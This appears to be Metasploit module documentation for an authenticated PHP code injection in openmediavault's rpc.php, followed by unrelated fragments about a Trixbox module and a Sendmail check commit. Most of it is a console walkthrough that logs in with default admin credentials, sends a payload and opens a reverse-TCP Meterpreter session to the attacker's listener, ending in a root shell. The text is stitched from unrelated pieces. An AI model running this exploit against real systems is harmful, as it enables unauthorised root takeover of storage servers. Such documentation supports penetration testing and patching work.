This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 inclusive in the "sortfield" POST parameter of "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.
### Usage Example
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options
Module options (exploit/unix/webapp/openmediavault_rpc_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword openmediavault yes Password to login with
HttpUsername admin yes User to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Linux Dropper)
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)
meterpreter > sysinfo
Computer : 192.168.56.108
OS : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```
This module exploits a post-authentication OS command injection vulnerability found in Trixbox CE <= v2.8.0.4 which may allow arbitrary command execution on the underlying operating system.
Also updates the check to be more precise. I had originally copied the
check method from the Morris worm Sendmail exploit:
220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST
Note that there was no "ESMTP" string in 1985's Sendmail.
William Vu